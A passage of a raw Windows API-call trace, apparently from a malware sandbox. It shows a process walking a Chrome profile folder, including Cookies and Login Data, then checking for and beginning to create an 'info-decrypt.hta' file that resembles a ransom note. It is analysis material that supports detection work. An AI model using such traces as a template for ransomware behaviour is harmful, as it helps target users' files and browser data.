ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x98d44890, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cookies-journal", cAlternateFileName="COOKIE~1")) returned 1 [0192.734] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x83b08a50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x83b08a50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0b57b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Current Session", cAlternateFileName="CURREN~1")) returned 1 [0192.734] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c3b6860, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c3b6860, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c3b8f70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x126, dwReserved0=0x0, dwReserved1=0x0, cFileName="Current Tabs", cAlternateFileName="CURREN~2")) returned 1 [0192.734] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80916060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80916060, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_reduction_proxy_leveldb", cAlternateFileName="DATA_R~1")) returned 1 [0192.735] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82bed750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extension Rules", cAlternateFileName="EXTENS~3")) returned 1 [0192.735] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extension State", cAlternateFileName="EXTENS~2")) returned 1 [0192.735] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0192.735] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cce2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80cce2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80db2b00, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favicons", cAlternateFileName="")) returned 1 [0192.735] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cce2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80cce2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x80e97340, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favicons-journal", cAlternateFileName="FAVICO~1")) returned 1 [0192.735] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81c321d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81c321d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81c58330, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2b2e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Profile.ico", cAlternateFileName="GOOGLE~1.ICO")) returned 1 [0192.736] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802fc800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802fc800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x87f47590, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x19000, dwReserved0=0x0, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0192.736] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824d3190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824d3190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c3b6860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x142f, dwReserved0=0x0, dwReserved1=0x0, cFileName="History Provider Cache", cAlternateFileName="HISTOR~2")) returned 1 [0192.736] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802fc800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802fc800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x87f6d6f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="History-journal", cAlternateFileName="HISTOR~1")) returned 1 [0192.736] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x96ec4eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x96ec4eb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x96ec4eb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JumpListIcons", cAlternateFileName="JUMPLI~2")) returned 1 [0192.736] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85096390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85096390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JumpListIconsOld", cAlternateFileName="JUMPLI~1")) returned 1 [0192.736] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8642cdf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8642cdf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local Extension Settings", cAlternateFileName="LOCALE~1")) returned 1 [0192.736] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83ede170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x90191d70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x90191d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local Storage", cAlternateFileName="LOCALS~1")) returned 1 [0192.737] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80fc7e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80fc7e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8124f5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Login Data", cAlternateFileName="LOGIND~1")) returned 1 [0192.737] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80fc7e40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80fc7e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8129b860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Login Data-journal", cAlternateFileName="LOGIND~2")) returned 1 [0192.737] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82330270, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82330270, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x825f0410, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Action Predictor", cAlternateFileName="NETWOR~1")) returned 1 [0192.737] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82330270, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82330270, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8262ad90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Action Predictor-journal", cAlternateFileName="NETWOR~2")) returned 1 [0192.737] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86263d70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86263d70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86263d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network Persistent State", cAlternateFileName="NETWOR~3")) returned 1 [0192.737] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81d16a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81d16a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x94034050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin Bound Certs", cAlternateFileName="ORIGIN~1")) returned 1 [0192.738] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81d16a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81d16a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9405a1b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin Bound Certs-journal", cAlternateFileName="ORIGIN~2")) returned 1 [0192.738] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c43f3e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c446910, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1a9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferences", cAlternateFileName="PREFER~1")) returned 1 [0192.738] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f8dea80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f8dea80, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8129b860, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="previews_opt_out.db", cAlternateFileName="PREVIE~1.DB")) returned 1 [0192.738] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x804795c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x804795c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x812c19c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="previews_opt_out.db-journal", cAlternateFileName="PREVIE~1.DB-")) returned 1 [0192.738] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8687f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x869fc2d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuotaManager", cAlternateFileName="QUOTAM~1")) returned 1 [0192.738] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8687f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8687f510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86a48590, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QuotaManager-journal", cAlternateFileName="QUOTAM~2")) returned 1 [0192.739] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f846500, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f846500, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="README", cAlternateFileName="")) returned 1 [0192.739] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857e1690, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c3f38f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c404a60, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8b43, dwReserved0=0x0, dwReserved1=0x0, cFileName="Secure Preferences", cAlternateFileName="SECURE~1")) returned 1 [0192.739] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8218d350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8218d350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82271b90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shortcuts", cAlternateFileName="SHORTC~1")) returned 1 [0192.739] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8218d350, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8218d350, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x822e3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shortcuts-journal", cAlternateFileName="SHORTC~2")) returned 1 [0192.739] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x84251e10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x84251e10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sync Extension Settings", cAlternateFileName="SYNCEX~1")) returned 1 [0192.739] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d66840, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d66840, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8195e7b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Top Sites", cAlternateFileName="TOPSIT~1")) returned 1 [0192.740] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80d8c9a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80d8c9a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81984910, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Top Sites-journal", cAlternateFileName="TOPSIT~2")) returned 1 [0192.740] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88c2e920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x88c2e920, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x88c2e920, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x278, dwReserved0=0x0, dwReserved1=0x0, cFileName="TransportSecurity", cAlternateFileName="TRANSP~1")) returned 1 [0192.740] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80ee3600, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x80ee3600, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6cde50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Visited Links", cAlternateFileName="VISITE~1")) returned 1 [0192.740] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x868593b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x868593b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Applications", cAlternateFileName="WEBAPP~1")) returned 1 [0192.740] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d370c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Data", cAlternateFileName="WEBDAT~1")) returned 1 [0192.740] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d608d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Data-journal", cAlternateFileName="WEBDAT~2")) returned 1 [0192.741] FindNextFileW (in: hFindFile=0xb7f190, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f86c660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f86c660, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82d608d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Data-journal", cAlternateFileName="WEBDAT~2")) returned 0 [0192.741] FindClose (in: hFindFile=0xb7f190 | out: hFindFile=0xb7f190) returned 1 [0192.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0192.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0192.742] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", nBufferLength=0x105, lpBuffer=0x949e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", lpFilePart=0x0) returned 0x5e [0192.742] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e658, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\info-decrypt.hta", lpFilePart=0x0) returned 0x5c [0192.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab8) returned 1 [0192.742] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eb34 | out: lpFileInformation=0x949eb34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0192.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab4) returned 1 [0192.743] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", nBufferLength=0x105, lpBuffer=0x949e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico", lpFilePart=0x0) returned 0x5e [0192.743] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\info-decrypt.hta", lpFilePart=0x0) returned 0x5c [0192.743] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9ec) returned 1 [0192.743] CreateFileW 